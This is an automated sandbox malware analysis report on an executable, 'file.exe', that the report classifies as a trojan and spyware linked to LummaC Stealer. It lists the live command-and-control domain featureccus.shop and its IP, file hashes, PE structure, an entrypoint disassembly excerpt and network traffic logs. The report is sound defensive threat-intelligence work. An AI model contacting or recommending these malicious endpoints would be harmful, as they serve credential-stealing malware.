https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000002.00000002.1500056161.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1425709061.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1453464368.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1396465507.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1399475998.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1474226267.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://featureccus.shop/bdMAn2x	file.exe, 00000002.00000003.1499111265.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://featureccus.shop/bdMAnM3	file.exe, 00000002.00000003.1498948316.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1500039877.0000000000ED2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1499243054.0000000000ED1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1453464368.0000000000ED2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&4	file.exe, 00000002.00000002.1500056161.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1453464368.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1474226267.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	file.exe, 00000002.00000002.1500056161.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1425709061.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1453464368.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1396465507.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1399475998.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1474226267.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	false		high
https://featureccus.shop/Y	file.exe, 00000002.00000003.1362793644.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1363337122.0000000000EE6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000002.00000003.1364722016.0000000003658000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPOm	file.exe, 00000002.00000002.1500056161.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1453464368.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1474226267.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.mozilla.or	file.exe, 00000002.00000003.1364601139.0000000003452000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	file.exe, 00000002.00000003.1425709061.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1396465507.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1399475998.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.204.104	featureccus.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1634235
Start date and time:	2025-03-10 21:01:56 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 91% Number of executed functions: 26 Number of non-executed functions: 134
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:03:01	API Interceptor	7x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.204.104	https://url7923.marsello.io/ls/click?upn=Xn88PJeNIL29Y2OVpP6UizfreqwQbCbw2-2FQ-2Ba7t3nUo-3DRtjf_x0O1MvUhCs5gpiEq-2FvhpN1YFxgRtmNHCTztitgmT5KMIkN2ulXAZzM4rIvPk3PDzIC7GTFOjNtbc8g4sxFRMUt7XzfeBuikYmvxihwS-2BFOknQ7EnTXDBzFrbxdglt01TsXlSiD0N4KiMj2S1cD0jh37Bv8eCRCLna3kz36lHyk0D51b42LTWKWQbHOqfl-2BEixv9PFroyTprHQFaxryJcKwqxhewf53sK6DYkm0sR0ukGLcDPVcNlHS-2Fedrcpt6vL4C0UVddW7ds2l3o0QrJ-2FBuCdOecEBlLU6p7-2FF-2FzvEoMuw1hPLek7xzSPQQFXyr2h	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
featureccus.shop	download.php.exe.bin.exe	Get hash	malicious	Amadey, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.93.43

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Fd-Employee-Handbook(1).pdf	Get hash	malicious	Unknown	Browse	172.64.41.3
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://poshmark-bundle.sale/reit	Get hash	malicious	Unknown	Browse	104.17.245.203
	q2e132qweertgd.exe.bin.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.4.235
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	104.16.145.15
	download.php.exe.bin.exe	Get hash	malicious	Amadey, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.95.8
	PatricksParabox.exe.bin.exe	Get hash	malicious	Quasar	Browse	172.67.74.152
	SmartPDFPro.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	tsles(x86).exe	Get hash	malicious	LummaC Stealer	Browse	104.21.93.40
	URGENT REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook	Browse	104.21.18.45

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.204.104
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.204.104
	tnyg2PUsAn.exe	Get hash	malicious	Unknown	Browse	172.67.204.104
	External2.4.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.204.104
	Inst#U0430ll.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	172.67.204.104
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.204.104
	Superority.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.204.104
	tnyg2PUsAn.exe	Get hash	malicious	Unknown	Browse	172.67.204.104
	StrikeLeague_Setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.204.104
	wanscam software ocx setup download.exe	Get hash	malicious	Unknown	Browse	172.67.204.104

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.503393997706209
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'000'448 bytes
MD5:	3d27865e186de4d99d25418e0c0789ff
SHA1:	38ee0c392428adbac12bc5ce77a11ff9dbb90c76
SHA256:	e249bb655c70e29e6dac7e7274a94b2f1db6e60275e1a76c6f5c1de1de241f0a
SHA512:	16630d8635b16810bc10287fa7b988819db258c76234da5ce1aca055f5425379acf319c0ea12f94a010bcceba5a08f936e334848ba8518171cc245837fd59853
SSDEEP:	24576:OCfnWybkxgxVpCPv+jCv7RMIzvBstk1+53MKlMHH/+g6l4S:OCPWyIxgxL6+jQRMIbgk1+/lMnmg6j
TLSH:	D425D07270C1C173FA5169B635A8E2B9506BFA73DA2D4FC791B4F734D044AC01BAA12E
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...1..g.................z..........R.............@..........................`............@.................................8...(..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x46c452
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67CEB331 [Mon Mar 10 09:38:57 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	5939c2f1c22856cd3b44078e652cb2e3

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
call 00007F98A8ED09CAh
jmp 00007F98A8ED0839h
mov ecx, dword ptr [00494840h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F98A8ED09C6h
test esi, ecx
jne 00007F98A8ED09E8h
call 00007F98A8ED09F1h
mov ecx, eax
cmp ecx, edi
jne 00007F98A8ED09C9h
mov ecx, BB40E64Fh
jmp 00007F98A8ED09D0h
test esi, ecx
jne 00007F98A8ED09CCh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [00494840h], ecx
not ecx
pop edi
mov dword ptr [00494880h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [00491850h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [00491810h]
xor dword ptr [ebp-04h], eax
call dword ptr [0049180Ch]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [00491898h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00496490h
call dword ptr [00491870h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F98A8ED7515h
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x91638	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x97c00	0x4540
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x98000	0x42d4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x8db28	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x89f98	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x917ac	0x14c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x878a0	0x87a00	49ce3e06b7633ea4ba2543391f1fb7af	False	0.5285354262672811	data	7.102077354688428	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x89000	0xa05c	0xa200	e7311b30b375b42bee27999c2222e83b	False	0.4240692515432099	data	4.909566438630559	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x94000	0x2c5c	0x1600	4c8b3b4697612b69c46f9a192b62637c	False	0.4074928977272727	data	4.7417229875261615	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x97000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x98000	0x42d4	0x4400	3b86da5deb8ceea5b6a09d777d15cc29	False	0.7855009191176471	data	6.683317595491251	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x9d000	0x58200	0x58200	260b3a8edb0e5e494cba27542c81e4e5	False	1.0003352171985815	data	7.999551152769569	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-10T21:03:00.709674+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49694	172.67.204.104	443	TCP
2025-03-10T21:03:03.927763+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49695	172.67.204.104	443	TCP
2025-03-10T21:03:07.416059+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49696	172.67.204.104	443	TCP
2025-03-10T21:03:10.295651+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49697	172.67.204.104	443	TCP
2025-03-10T21:03:13.708312+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49698	172.67.204.104	443	TCP
2025-03-10T21:03:17.241459+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49700	172.67.204.104	443	TCP
2025-03-10T21:03:21.072169+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49702	172.67.204.104	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2025 21:02:59.059585094 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:02:59.059640884 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:02:59.059709072 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:02:59.063297987 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:02:59.063327074 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:00.709516048 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:00.709673882 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:00.749095917 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:00.749133110 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:00.749377966 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:00.792320967 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:01.031104088 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:01.031104088 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:01.032387018 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.829788923 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.829834938 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.829866886 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.829899073 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.829902887 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:01.829978943 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.830023050 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:01.836287022 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.836345911 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:01.836364031 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.842938900 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.842974901 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.842999935 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:01.843017101 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.843071938 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:01.849757910 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.892087936 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.892162085 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:01.898583889 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:01.898627043 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:01.898658991 CET	49694	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:01.898674011 CET	443	49694	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:02.212874889 CET	49695	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:02.212929010 CET	443	49695	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:02.213006020 CET	49695	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:02.213294983 CET	49695	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:02.213308096 CET	443	49695	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:03.927678108 CET	443	49695	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:03.927762985 CET	49695	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:03.929331064 CET	49695	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:03.929341078 CET	443	49695	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:03.929584980 CET	443	49695	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:03.930991888 CET	49695	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:03.931179047 CET	49695	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:03.931210041 CET	443	49695	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:03.931296110 CET	49695	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:03.972331047 CET	443	49695	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:04.834619045 CET	443	49695	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:04.838131905 CET	443	49695	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:04.841941118 CET	49695	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:04.953629017 CET	49695	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:04.953675032 CET	443	49695	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:05.629338980 CET	49696	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:05.629393101 CET	443	49696	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:05.629472971 CET	49696	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:05.629770994 CET	49696	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:05.629785061 CET	443	49696	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:07.415900946 CET	443	49696	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:07.416059017 CET	49696	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:07.417637110 CET	49696	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:07.417649031 CET	443	49696	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:07.417891979 CET	443	49696	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:07.419061899 CET	49696	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:07.419212103 CET	49696	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:07.419243097 CET	443	49696	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:07.419313908 CET	49696	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:07.460335970 CET	443	49696	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:08.213726044 CET	443	49696	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:08.213841915 CET	443	49696	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:08.213901043 CET	49696	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:08.215249062 CET	49696	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:08.215266943 CET	443	49696	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:08.454051018 CET	49697	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:08.454104900 CET	443	49697	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:08.454171896 CET	49697	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:08.454565048 CET	49697	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:08.454580069 CET	443	49697	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:10.295538902 CET	443	49697	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:10.295650959 CET	49697	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:10.302396059 CET	49697	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:10.302433968 CET	443	49697	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:10.302654982 CET	443	49697	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:10.303894043 CET	49697	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:10.304035902 CET	49697	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:10.304075003 CET	443	49697	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:10.304172993 CET	49697	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:10.304188013 CET	443	49697	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:11.515320063 CET	443	49697	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:11.515599966 CET	49697	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:11.923929930 CET	49698	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:11.923975945 CET	443	49698	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:11.924048901 CET	49698	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:11.924431086 CET	49698	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:11.924443007 CET	443	49698	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:13.708179951 CET	443	49698	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:13.708312035 CET	49698	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:13.709978104 CET	49698	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:13.710012913 CET	443	49698	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:13.710279942 CET	443	49698	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:13.711421013 CET	49698	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:13.711533070 CET	49698	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:13.711571932 CET	443	49698	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:14.449040890 CET	443	49698	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:14.455929041 CET	443	49698	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:14.456003904 CET	49698	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:14.514257908 CET	49698	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:14.514305115 CET	443	49698	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:15.510869980 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:15.510925055 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:15.511028051 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:15.513098001 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:15.513112068 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.241283894 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.241458893 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.242723942 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.242733955 CET	443	49700	172.67.204.104	192.168.2.6
